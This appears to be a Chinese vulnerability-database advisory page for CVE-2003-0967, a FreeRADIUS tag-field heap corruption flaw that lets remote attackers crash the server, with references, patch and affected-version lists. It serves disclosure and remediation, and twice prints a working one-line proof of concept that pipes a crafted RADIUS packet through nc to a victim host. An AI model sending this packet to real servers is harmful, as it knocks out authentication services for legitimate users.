CVE-2003-0967
CVSS5.0
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:35
NMCOES    

[原文]rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a -1 length argument, as demonstrated using the Tunnel-Password attribute.


[CNNVD]FreeRADIUS Tag头字段堆破坏漏洞(CNNVD-200312-028)

        
        FreeRadius是一款开放源代码使用RADIUS协议的验证和帐户系统。
        FreeRadius没有正确处理输入的tag字段数据,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        问题存在于FreeRadius处理访问请求包中的"Tunnel-Password"属性时,此属性包含'tag' (RFC 2868)和'string'类型,其为2-3长度的字节,可导致服务器调用长度为'-1'的'memcpy'函数。
        之后RADIUS属性的256字节的包内容拷贝到当前堆结构,而其他的数据就会覆盖后续的堆内容,由于RADIUS只有4K长度,因此,覆盖结构头之后,攻击者还有3.5K数据进行攻击。
        发送包的源地址IP必须列于服务器配置的安全列表中,不过RADIUS不需要包签名 ,任何网络上机器发送伪造的UDP包可导致RADIUS服务程序崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10917rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute ...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0967
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0967
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-028
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106935911101493&w=2
(UNKNOWN)  BUGTRAQ  20031120 Remote DoS in FreeRADIUS, all versions.
http://marc.info/?l=bugtraq&m=106944220426970
(UNKNOWN)  BUGTRAQ  20031121 FreeRADIUS 0.9.2 "Tunnel-Password" attribute Handling Vulnerability
http://marc.info/?l=freeradius-users&m=106947389449613&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=freeradius-users&m=106947389449613&w=2
http://www.redhat.com/support/errata/RHSA-2003-386.html
(UNKNOWN)  REDHAT  RHSA-2003:386

- 漏洞信息

FreeRADIUS Tag头字段堆破坏漏洞
中危 输入验证
2003-12-15 00:00:00 2005-10-20 00:00:00
远程  
        
        FreeRadius是一款开放源代码使用RADIUS协议的验证和帐户系统。
        FreeRadius没有正确处理输入的tag字段数据,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        问题存在于FreeRadius处理访问请求包中的"Tunnel-Password"属性时,此属性包含'tag' (RFC 2868)和'string'类型,其为2-3长度的字节,可导致服务器调用长度为'-1'的'memcpy'函数。
        之后RADIUS属性的256字节的包内容拷贝到当前堆结构,而其他的数据就会覆盖后续的堆内容,由于RADIUS只有4K长度,因此,覆盖结构头之后,攻击者还有3.5K数据进行攻击。
        发送包的源地址IP必须列于服务器配置的安全列表中,不过RADIUS不需要包签名 ,任何网络上机器发送伪造的UDP包可导致RADIUS服务程序崩溃。
        

- 公告与补丁

        厂商补丁:
        FreeRADIUS
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        FreeRADIUS Upgrade freeradius-0.9.3.tar.gz
        ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz

- 漏洞信息 (23391)

FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability (EDBID:23391)
linux dos
2003-11-20 Verified
0 Evgeny Legerov
N/A [点击下载]
source: http://www.securityfocus.com/bid/9079/info

FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.

This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.

This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.

UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.

bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>

		

- 漏洞信息

2850
FreeRADIUS Tagged Attribute Handling DoS
Denial of Service
Loss of Availability

- 漏洞描述

FreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when reception of a malformed packet sent to the service occurs, and will result in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an "Access-Request" packet containing a "Tunnel-Password" attribute.

- 时间线

2003-11-20 2003-11-20
2003-11-21 Unknow

- 解决方案

Upgrade to version 0.9.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

FreeRADIUS Tag Field Heap Corruption Vulnerability
Input Validation Error 9079
Yes No
2003-11-20 12:00:00 2009-09-10 08:41:00
Discovery credited to Evgeny Legerov.

- 受影响的程序版本

RedHat Enterprise Linux WS 5
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux 5 server
Red Hat Enterprise Linux Desktop 5 client
Red Hat Enterprise Linux AS 3
FreeRADIUS FreeRADIUS 1.1.7
FreeRADIUS FreeRADIUS 1.1.6
FreeRADIUS FreeRADIUS 1.1.5
FreeRADIUS FreeRADIUS 1.1.4
FreeRADIUS FreeRADIUS 1.1.3
FreeRADIUS FreeRADIUS 0.9.2
FreeRADIUS FreeRADIUS 0.9.1
FreeRADIUS FreeRADIUS 0.9
FreeRADIUS FreeRADIUS 0.8.1
FreeRADIUS FreeRADIUS 0.8
FreeRADIUS FreeRADIUS 0.5
FreeRADIUS FreeRADIUS 0.4
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.2
FreeRADIUS FreeRADIUS 1.1.8
FreeRADIUS FreeRADIUS 0.9.3

- 不受影响的程序版本

FreeRADIUS FreeRADIUS 1.1.8
FreeRADIUS FreeRADIUS 0.9.3

- 漏洞讨论

FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.

This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.

This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.

UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.

- 漏洞利用

Attackers may exploit this issue using readily available commands.

The following example command is available:

bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 &lt;victim&gt; &lt;port&gt;

- 解决方案

The vendor has released updates. Please see the references for details.


FreeRADIUS FreeRADIUS 0.2

FreeRADIUS FreeRADIUS 0.3

FreeRADIUS FreeRADIUS 0.3

FreeRADIUS FreeRADIUS 0.4

FreeRADIUS FreeRADIUS 0.5

FreeRADIUS FreeRADIUS 0.8

FreeRADIUS FreeRADIUS 0.8.1

FreeRADIUS FreeRADIUS 0.9

FreeRADIUS FreeRADIUS 0.9.1

FreeRADIUS FreeRADIUS 0.9.2

FreeRADIUS FreeRADIUS 1.1.3

FreeRADIUS FreeRADIUS 1.1.4

FreeRADIUS FreeRADIUS 1.1.5

FreeRADIUS FreeRADIUS 1.1.6

FreeRADIUS FreeRADIUS 1.1.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站